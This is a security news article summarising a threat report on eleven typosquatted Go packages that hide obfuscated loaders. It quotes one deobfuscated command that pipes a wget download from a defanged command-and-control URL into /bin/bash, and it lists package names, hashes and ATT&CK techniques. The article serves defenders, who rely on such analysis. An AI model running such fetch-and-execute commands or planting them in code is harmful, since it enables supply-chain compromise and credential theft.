Malicious Go Packages Used by Threat Actors to Deploy Obfuscated Remote Payloads

Socket’s Threat Research Team has identified eleven malicious Go packages distributed via GitHub, with ten remaining active on the Go Module Mirror, posing ongoing risks to developers and CI/CD pipelines.

Eight of these packages employ typosquatting techniques, mimicking legitimate modules to exploit namespace confusion in Go’s decentralized ecosystem, where direct imports from repositories can lead to inadvertent integration of malicious code.

Campaign Overview

The packages conceal an index-based string obfuscation routine that, at runtime, spawns a shell to download and execute second-stage payloads from interchangeable command-and-control (C2) endpoints primarily on .icu and .tech domains.

Most endpoints share the path /storage/de373d0df/a31546bf, with six still accessible, enabling threat actors to maintain on-demand access to compromised systems.

This campaign targets both Linux build servers and Windows workstations, leveraging platform-specific loaders: on Unix, it pipes wget-downloaded bash scripts directly into /bin/bash for diskless execution, while on Windows, it utilizes certutil.exe for ingress tool transfer followed by background process injection.

Observed payloads include ELF and PE binaries that enumerate host information, exfiltrate browser credentials, and establish outbound beacons, often preceded by a one-hour sleep to evade sandbox analysis.

Technical Breakdown

The obfuscation mechanism involves constructing commands from string arrays via indexed concatenation, as exemplified in github.com/expertsandba/opt, where a function assembles an exec.Command(“/bin/sh”, “-c”, ) call that resolves to “wget -O – https://monsoletter[.]icu/storage/de373d0df/a31546bf | /bin/bash &”.

This fetches a bash script that, after a sleep delay, downloads and executes a persistent ELF binary (SHA256: 844013025bf7c5d01e6f48df0e990103ad3c333be31f54cf5301e1463f6ca441) for filesystem enumeration and network requests.

Similar patterns appear across packages, such as github.com/weightycine/replika, which deobfuscates dual commands targeting Linux and Windows with C2s like https://infinityhel[.]icu/storage/de373d0df/a31546bf and https://infinityhel[.]icu/storage/bbb28ef04/fa31546b, the latter delivering a malicious PE executable (SHA256: 4a8bf419424ff42b736a51472d35a2c172e4c60b762c519b0b2f9eb04690726c) for credential theft.

Packages like github.com/ordinarymea/tnsr_ids and github.com/lastnymph/gouid reuse C2 infrastructure, suggesting a common threat actor, with payloads incorporating evasion via sleep (e.g., SHA256: 2b55430b90a500cb2bb9ddc530aeb1ffb8d2f8878148b7204ab7ef998d66eb9d) and exfiltration (SHA256: 42f3f9d2684328575847f3115fcd6f759cc47b0f21b3d4fea480de0f34a1e947).

Typosquatting exacerbates risks, as seen in github.com/stripedconsu/linker mimicking github.com/logrange/linker, and github.com/cavernouskina/mcp-go imitating benign counterparts, exploiting Go’s registry ambiguities where search results often yield unrelated or low-import modules.

Commonalities include seven C2 paths ending in /storage/de373d0df/a31546bf, uniform obfuscation, and bash-piped loaders, aligning with MITRE ATT&CK techniques such as T1059.004 (Unix Shell), T1059.003 (Windows Command Shell), T1218.010 (Certutil), T1105 (Ingress Tool Transfer), T1055 (Process Injection), T1027 (Obfuscated Files), and T1036 (Masquerading).

According to the report, This echoes prior campaigns documented by Socket, involving wget-based destructive payloads and malware loaders in typosquatted modules.

With packages persisting online, threat actors can rotate infrastructure, underscoring the need for proactive defenses like real-time dependency scanning, audits, and tools for detecting obfuscation and typosquatting to mitigate supply chain attacks.

Indicators of Compromise (IOCs)

The Ultimate SOC-as-a-Service Pricing Guide for 2025– Download for Free